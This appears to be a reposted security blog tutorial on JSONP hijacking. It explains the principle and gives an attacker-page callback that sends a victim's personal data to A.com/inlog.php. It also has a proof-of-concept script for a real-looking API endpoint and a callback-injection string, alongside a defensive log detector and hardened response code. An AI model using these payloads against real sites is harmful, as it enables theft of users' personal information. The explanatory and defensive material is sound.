A practical JSONP vulnerability

Table of Contents

Description

Principle

Flow chart

Environment

POC

Process

Repair suggestions

Description

JSONP (JSON with Padding) is a "usage pattern" of JSON that allows a web page to obtain data from another domain (website), that is, to read data cross-domain.

Why is a special technique (JSONP) needed to access data from a different domain (website)? Because of the same-origin policy.

The same-origin policy is a well-known security policy originally proposed by Netscape; today every browser that supports JavaScript enforces it.

The callback value passed in is returned directly in the response. Therefore, if the parameter is not strictly filtered, you can pass in whatever you want: with a callback value of alert('1');parseResponse the response becomes a string that first pops an alert window and then continues to execute normally.

In fact, the vulnerability is caused by the server's lax checking of the source of the JSONP request.

The attacker's page, acting as the user, sends a JSONP request to the vulnerable server, obtains some of the user's information from the response, and then forwards that information to a server controlled by the attacker.

Principle

The most basic principle of JSONP is to dynamically add a <script> tag, because the src attribute of a script tag is not subject to cross-domain restrictions. Under the same-origin policy, XMLHttpRequest may only request resources from the current origin (same domain name, protocol and port). To make a cross-domain request we can therefore use an HTML script tag, and have the response return the script code to be executed, which can carry a JSON-encoded JavaScript object directly.

Consider two websites, A and B. The user registers on website B and fills in a user name, mobile phone number, ID number and other information. Website B has a JSONP interface which, while the user is visiting website B, returns the user's personal information and displays it on B's HTML page. If website B's source verification for this JSONP interface is flawed, then when the user visits website A, website A can exploit this flaw to perform JSONP hijacking and obtain the user's information.

The specific exploitation flow is as follows:

1. The user registers an account on website B, fills in a mobile phone number, name, ID and other personal information, and stays logged in.

2. The user opens a URL on website A in the same browser. Website A may be a page the user often logs in to, or a page of a large vendor that has been maliciously hijacked.

3. Website A's page contains a malicious JSONP callback function and <script> tag. Sample code:

<script type="text/javascript">
function callback(result)
{
    // Invoked by B.com's JSONP response; forwards the received data to
    // A.com's inlog.php (step 4). $.ajax assumes jQuery is loaded on the page.
    var logUrl = "http://A.com/inlog.php?" + "result=" + result;
    $.ajax({
        url: logUrl,
        type: "GET",
        cache: false
    });
}
</script>
<script type="text/javascript" src="http://B.com/userinfo.php?"></script>

4. Website A hosts an inlog.php. When the callback function is triggered, a request is sent to inlog.php, which records the request in the file log.txt.

5. After the user requests website A, the malicious code on website A sends a JSONP request to website B and receives the data that website B returns.

6. After the browser receives the data returned by website B, it calls the callback function on website A's page, which saves the user's information registered on website B into log.txt.
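On the defender's side, the flow above leaves a trace in website B's access log: a request to the JSONP interface carrying a callback parameter, with a Referer that belongs to a third-party origin such as A.com, or no Referer at all. The following added example (not code from the original post) runs that check over a few constructed combined-log-format lines; the endpoint path, the trusted origins and the log lines are all assumptions chosen to match the scenario.

```javascript
// Added example, not the original post's code: flag JSONP requests to a sensitive
// endpoint whose Referer is missing or belongs to an origin other than the site's own.
// Endpoint path, trusted origins and log lines are constructed assumptions.
const SENSITIVE_JSONP_PATHS = ["/userinfo.php"];                          // assumption: B.com's interface
const TRUSTED_ORIGINS = new Set(["https://b.com", "https://www.b.com"]); // assumption: B's own origins

// Constructed combined-log-style sample lines (IP, time, request, status, size, Referer, UA).
const SAMPLE_LOG = [
  '10.0.0.5 - - [18/Nov/2020:10:00:01 +0800] "GET /userinfo.php?callback=jsonp_1 HTTP/1.1" 200 812 "https://www.b.com/profile" "Mozilla/5.0"',
  '10.0.0.7 - - [18/Nov/2020:10:00:09 +0800] "GET /userinfo.php?callback=callback HTTP/1.1" 200 812 "http://a.com/" "Mozilla/5.0"',
  '10.0.0.9 - - [18/Nov/2020:10:00:12 +0800] "GET /userinfo.php?callback=evil HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
  '10.0.0.3 - - [18/Nov/2020:10:00:15 +0800] "GET /static/app.js HTTP/1.1" 200 4012 "http://a.com/" "Mozilla/5.0"',
];

const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \d+ "([^"]*)" "([^"]*)"$/;

// Parse one log line into its fields; returns null for lines that do not match.
function parseLogLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  // The base URL is only needed so that a bare path parses; it is never contacted.
  const url = new URL(m[4], "http://placeholder.invalid");
  return {
    ip: m[1], time: m[2], method: m[3],
    path: url.pathname, query: url.searchParams,
    status: Number(m[5]), referer: m[6], userAgent: m[7],
  };
}

// Origin part of a Referer header, or null when it is absent ("-") or unparseable.
function refererOrigin(referer) {
  if (!referer || referer === "-") return null;
  try { return new URL(referer).origin; } catch { return null; }
}

// Returns the suspicious entries: callback-style requests to a sensitive path
// whose Referer is missing or not one of the trusted origins.
function findJsonpHijackCandidates(lines) {
  const hits = [];
  for (const line of lines) {
    const e = parseLogLine(line);
    if (!e || !SENSITIVE_JSONP_PATHS.includes(e.path)) continue;
    const cb = e.query.get("callback") ?? e.query.get("jsoncallback");
    if (cb === null) continue; // plain JSON request, not a JSONP call
    const origin = refererOrigin(e.referer);
    if (origin === null || !TRUSTED_ORIGINS.has(origin)) {
      hits.push({
        ip: e.ip, time: e.time, callback: cb, referer: e.referer,
        reason: origin === null ? "missing-referer" : "third-party-referer",
      });
    }
  }
  return hits;
}

// Stand-alone run: prints the two suspicious requests from the sample log.
console.log(findJsonpHijackCandidates(SAMPLE_LOG));
```

A missing Referer is weaker evidence than a third-party one, since Referrer-Policy settings and privacy tooling strip the header on legitimate requests, so the "missing-referer" hits are best ranked by volume per IP and per callback name before anyone is paged.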

Flow chart

(flow-chart image not reproduced in this text)

Environment

Actual business environment

Common keywords are as follows:

POC

<script>
function calmness(a){
    alert(a);
    alert(/xss/);
}
</script>
<script src="http://IP:9081/api/v0/sqjr/resident/service/BannerInfo.queryRecommendList.json?province=%E6%B5%99%E6%B1%9F%E7%9C%81&city=%E6%9D%AD%E5%B7%9E%E5%B8%82&jsoncallback=calmness"></script>


Process

First, find the address where the vulnerability exists:

http://IP:9081/api/v0/sqjr/resident/service/BannerInfo.queryRecommendList.json?province=%E6%B5%99%E6%B1%9F%E7%9C%81&city=%E6%9D%AD%E5%B7%9E%E5%B8%82&jsoncallback=jsonp_1605671133151_19776

Change the jsoncallback parameter in the request to calmness, and the beginning of the response body now reads calmness(...).

The calmness passed in is the function name, and the server returns a function call. This can be read as: evil is a function and (["customername1","customername2"]) is its argument; the website's front end only needs to write code that processes the returned value.

Continuing:

If we change the value of jsoncallback to something else, the return value changes accordingly. We can hijack the jsoncallback parameter and supply our own jsoncallback handler function. When the victim clicks our forged link, a request is made to the JSONP interface, and the returned data is handled by our own jsoncallback function, which achieves the hijacking.

Write the POC, or go further and mine the data.

Of course, there are also CSRF attacks that bypass token protection, bypass the Referer header, and so on.


Repair suggestions

Output JSON with the correct HTTP headers and avoid cross-domain data transfer as far as possible. For data transfer within the same domain, use XMLHttpRequest to fetch the data, relying on the browser's same-origin JavaScript security to protect it. If data must cross domains, sensitive data must only be released after authentication and authorization.
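The repair suggestions above, in working form, as an added example that is not the original post's or any site's code: a response builder for an interface like B.com's userinfo.php that serves plain JSON for same-origin XMLHttpRequest, uses CORS with an origin allowlist for the cross-domain case, and, where a legacy JSONP interface must be kept, validates the callback name and checks the request source before padding anything. The trusted origins, the user record and the function names are assumptions.

```javascript
// Added example, not the original post's code: hardened response builders for a
// JSON / JSONP user-info interface. Allowlist and sample record are constructed assumptions.
const TRUSTED_SITE_ORIGINS = new Set(["https://b.com", "https://www.b.com"]); // assumption

// A JSONP callback name must be a plain identifier. This rejects values such as
// alert('1');parseResponse that would otherwise be echoed into the script body.
const SAFE_CALLBACK_RE = /^[A-Za-z_$][\w$]{0,63}$/;

// Origin part of a header value (Referer or Origin); null when absent or unparseable.
function headerOrigin(value) {
  try { return new URL(value).origin; } catch { return null; }
}

function forbidden(reason) {
  return {
    status: 403,
    headers: { "Content-Type": "application/json; charset=utf-8" },
    body: JSON.stringify({ error: reason }),
  };
}

// 1. Same-domain data: plain JSON for XMLHttpRequest/fetch. A JSON content type plus
//    nosniff means the browser will never execute this body as a script.
function jsonResponse(data) {
  return {
    status: 200,
    headers: {
      "Content-Type": "application/json; charset=utf-8",
      "X-Content-Type-Options": "nosniff",
    },
    body: JSON.stringify(data),
  };
}

// 2. Cross-domain data without JSONP: CORS with an explicit allowlist. The browser
//    enforces who may read the response, and the session cookie never leaks into a script.
function corsJsonResponse(data, requestOrigin) {
  if (!TRUSTED_SITE_ORIGINS.has(requestOrigin)) return forbidden("origin not allowed");
  const r = jsonResponse(data);
  r.headers["Access-Control-Allow-Origin"] = requestOrigin;
  r.headers["Vary"] = "Origin";
  return r;
}

// 3. Legacy JSONP that cannot be removed yet: validate the callback name, require a
//    Referer from the site's own origins (reject when it is absent), and serve as
//    JavaScript with nosniff. The leading /**/ is the usual guard against the body being
//    re-interpreted as another file format (the Rosetta Flash class of content confusion).
function jsonpResponse(data, callbackName, referer) {
  if (typeof callbackName !== "string" || !SAFE_CALLBACK_RE.test(callbackName)) {
    return { status: 400, headers: { "Content-Type": "text/plain; charset=utf-8" }, body: "invalid callback" };
  }
  const origin = headerOrigin(referer);
  if (origin === null || !TRUSTED_SITE_ORIGINS.has(origin)) {
    return forbidden("jsonp request source not allowed");
  }
  return {
    status: 200,
    headers: {
      "Content-Type": "application/javascript; charset=utf-8",
      "X-Content-Type-Options": "nosniff",
    },
    body: `/**/${callbackName}(${JSON.stringify(data)});`,
  };
}

// Constructed sample record standing in for the data the interface returns.
const SAMPLE_USER = { name: "user1", phone: "13800000000", id: "REDACTED" };

// Stand-alone run: one accepted JSONP call and one rejected from a third-party page.
console.log(jsonpResponse(SAMPLE_USER, "calmness", "https://www.b.com/profile"));
console.log(jsonpResponse(SAMPLE_USER, "callback", "http://a.com/"));
```

The Referer check in jsonpResponse is the minimum that closes the flaw described in the Principle section; it is still weaker than CORS, because a Referer can be absent on legitimate requests and the padded script is executed with the user's session regardless of who embedded it, which is why the first two builders are preferred for anything sensitive.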



Origin blog.csdn.net/weixin_43650289/article/details/110820683